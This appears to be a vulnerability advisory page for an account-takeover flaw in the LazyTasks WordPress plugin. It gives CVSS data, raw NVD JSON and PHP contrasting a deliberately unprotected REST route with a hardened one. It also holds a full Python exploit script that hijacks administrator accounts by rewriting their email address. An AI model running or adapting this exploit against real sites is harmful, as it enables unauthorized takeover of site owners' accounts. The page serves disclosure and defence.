Security Vulnerability Report
CVE-2025-12963 CVSS 9.8 CRITICAL

CVE-2025-12963

Published: 2025-12-12 04:15:41
Last Modified: 2026-04-15 00:35:42

Description

The LazyTasks – Project & Task Management with Collaboration, Kanban and Gantt Chart plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 1.2.29. This is due to the plugin not properly validating a user's identity via the 'wp-json/lazytasks/api/v1/user/role/edit/' REST API endpoint prior to updating their details, such as the email address. This makes it possible for unauthenticated attackers to change arbitrary users' email addresses, including those of administrators, and leverage that to reset the user's password and gain access to their account. It is also possible for attackers to abuse this endpoint to grant users access to additional roles within the plugin.
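The root cause the advisory describes is a REST route with no authorization check (CWE-862). The following is an added illustration, not LazyTasks' own code: a WordPress route registered with a public permission callback that trusts the caller-supplied user_id, next to a hardened registration that decides authorization before the handler runs. The namespace, route paths, function names and capability choices are hypothetical.

```php
<?php
// Added illustration (not LazyTasks code): a REST route that edits a user's
// email/role without checking the caller, next to a hardened version (names hypothetical).
add_action( 'rest_api_init', function () {
    // Weak: '__return_true' makes the route reachable without any login,
    // and the handler trusts the user_id supplied in the request body.
    register_rest_route( 'lazytasks/api/v1', '/user/role/edit', array(
        'methods'             => 'POST',
        'callback'            => 'lt_weak_edit_user',
        'permission_callback' => '__return_true',
    ) );
    // Hardened: authorization is decided before the handler runs.
    register_rest_route( 'lazytasks/api/v1', '/user/edit', array(
        'methods'             => 'POST',
        'callback'            => 'lt_hardened_edit_user',
        'permission_callback' => 'lt_edit_user_permission',
    ) );
} );

function lt_weak_edit_user( WP_REST_Request $request ) {
    $user_id = (int) $request->get_param( 'user_id' );
    wp_update_user( array( 'ID' => $user_id, 'user_email' => $request->get_param( 'email' ) ) );
    return rest_ensure_response( array( 'ok' => true ) );
}

// Caller must be logged in (cookie auth also needs a valid X-WP-Nonce, checked by core
// before this runs) and be the targeted user or hold edit_users; roles need promote_users.
function lt_edit_user_permission( WP_REST_Request $request ) {
    if ( ! is_user_logged_in() ) {
        return new WP_Error( 'rest_unauthorized', 'Login required.', array( 'status' => 401 ) );
    }
    $user_id = (int) $request->get_param( 'user_id' );
    if ( get_current_user_id() !== $user_id && ! current_user_can( 'edit_users' ) ) {
        return new WP_Error( 'rest_forbidden', 'Cannot edit this user.', array( 'status' => 403 ) );
    }
    if ( null !== $request->get_param( 'role' ) && ! current_user_can( 'promote_users' ) ) {
        return new WP_Error( 'rest_forbidden', 'Cannot change roles.', array( 'status' => 403 ) );
    }
    return true;
}

function lt_hardened_edit_user( WP_REST_Request $request ) {
    $user_id = (int) $request->get_param( 'user_id' );
    $email   = sanitize_email( (string) $request->get_param( 'email' ) );
    if ( ! is_email( $email ) ) {
        return new WP_Error( 'rest_invalid_param', 'Invalid email.', array( 'status' => 400 ) );
    }
    $result = wp_update_user( array( 'ID' => $user_id, 'user_email' => $email ) );
    return is_wp_error( $result ) ? $result : rest_ensure_response( array( 'ok' => true ) );
}
```

When auditing a plugin for this class of bug, grep its register_rest_route calls for permission_callback values of '__return_true' and check whether the handler derives the target user from the request body rather than from get_current_user_id().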

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

LazyTasks WordPress plugin <= 1.2.29 (all versions affected)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-12963 PoC - LazyTasks Plugin Account Takeover
# Description: Unauthenticated privilege escalation via account takeover
# Affected: LazyTasks WordPress plugin <= 1.2.29
# Note: the payload field names below are this script's assumptions; the
# advisory does not document the endpoint's parameters.
import sys

import requests


class LazyTasksExploit:
    def __init__(self, target_url, target_email, attacker_email):
        self.target_url = target_url.rstrip('/')
        self.target_email = target_email
        self.attacker_email = attacker_email
        self.api_endpoint = '/wp-json/lazytasks/api/v1/user/role/edit/'

    def check_vulnerability(self):
        """Check if target is vulnerable"""
        print(f'[*] Checking if {self.target_url} is vulnerable...')
        # Try to access the vulnerable endpoint
        check_url = f'{self.target_url}{self.api_endpoint}'
        try:
            response = requests.get(check_url, timeout=10)
            if response.status_code in [200, 400, 405]:
                print('[+] Target appears to be running LazyTasks plugin')
                return True
        except requests.RequestException as e:
            print(f'[-] Error: {e}')
            return False
        return False

    def get_user_id(self, username):
        """Get WordPress user ID by username"""
        print(f'[*] Getting user ID for username: {username}')
        # Try WordPress REST API user endpoint
        user_url = f'{self.target_url}/wp-json/wp/v2/users?search={username}'
        try:
            response = requests.get(user_url, timeout=10)
            if response.status_code == 200 and response.json():
                user_id = response.json()[0]['id']
                print(f'[+] Found user ID: {user_id}')
                return user_id
        except (requests.RequestException, ValueError, KeyError, IndexError):
            pass
        # Fallback: the script only lists the candidate usernames and then
        # defaults to user ID 1 (the first WordPress user, usually the admin)
        for admin_user in ['admin', 'administrator', username]:
            print(f'    Trying username: {admin_user}')
        return 1  # Default to admin user ID

    def exploit_email_takeover(self, username):
        """Exploit the vulnerability to change target user's email"""
        print('[*] Exploiting email takeover vulnerability...')
        print(f'[*] Target email will be changed to: {self.attacker_email}')
        user_id = self.get_user_id(username)
        exploit_url = f'{self.target_url}{self.api_endpoint}'
        # Construct the exploit payload
        payload = {
            'user_id': user_id,
            'email': self.attacker_email,
            'action': 'update_email',
        }
        headers = {
            'Content-Type': 'application/json',
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
        }
        try:
            print(f'[*] Sending exploit request to {exploit_url}')
            response = requests.post(
                exploit_url,
                json=payload,
                headers=headers,
                timeout=10,
            )
            if response.status_code in [200, 201]:
                print('[+] Email change request sent successfully!')
                print('[+] Check attacker email for password reset link')
                print(f'[*] Password reset will be sent to: {self.attacker_email}')
                return True
            print(f'[-] Exploit failed with status code: {response.status_code}')
            print(f'[-] Response: {response.text[:200]}')
            return False
        except requests.RequestException as e:
            print(f'[-] Error during exploit: {e}')
            return False

    def privilege_escalation(self, username, new_role):
        """Exploit to escalate user privileges"""
        print(f'[*] Attempting privilege escalation for user: {username}')
        user_id = self.get_user_id(username)
        exploit_url = f'{self.target_url}{self.api_endpoint}'
        payload = {
            'user_id': user_id,
            'role': new_role,
            'action': 'update_role',
        }
        try:
            response = requests.post(
                exploit_url,
                json=payload,
                headers={'Content-Type': 'application/json'},
                timeout=10,
            )
            if response.status_code in [200, 201]:
                print(f'[+] Successfully escalated {username} to role: {new_role}')
                return True
        except requests.RequestException:
            pass
        return False


def main():
    if len(sys.argv) < 4:
        print('Usage: python cve-2025-12963.py <target_url> <target_username> <attacker_email>')
        print('Example: python cve-2025-12963.py http://target.com admin [email protected]')
        sys.exit(1)
    target_url = sys.argv[1]
    target_username = sys.argv[2]
    attacker_email = sys.argv[3]
    exploit = LazyTasksExploit(target_url, '', attacker_email)
    if exploit.check_vulnerability():
        print('[+] Target is potentially vulnerable!')
        print('\n[*] Step 1: Exploiting email takeover...')
        exploit.exploit_email_takeover(target_username)
        print('\n[!] After successful exploitation:')
        print('    1. Check attacker email for password reset link')
        print('    2. Click the reset link')
        print('    3. Set new password to complete account takeover')


if __name__ == '__main__':
    main()
```

References

https://wordpress.org/plugins/lazytasks-project-task-management/
https://www.wordfence.com/threat-intel/vulnerabilities/id/c6998185-0f9b-48ab-9dca-05adf5ae603a?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-12963",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-12T04:15:40.647",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The LazyTasks – Project & Task Management with Collaboration, Kanban and Gantt Chart plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 1.2.29. This is due to the plugin not properly validating a user's identity via the 'wp-json/lazytasks/api/v1/user/role/edit/' REST API endpoint prior to updating their details like email address. This makes it possible for unauthenticated attackers to change arbitrary user's email addresses, including administrators, and leverage that to reset the user's password and gain access to their account. It is also possible for attackers to abuse this endpoint to grant users with access to additional roles within the plugin"
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-862"}]
      }
    ],
    "references": [
      {"url": "https://wordpress.org/plugins/lazytasks-project-task-management/", "source": "[email protected]"},
      {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c6998185-0f9b-48ab-9dca-05adf5ae603a?source=cve", "source": "[email protected]"}
    ]
  }
}
```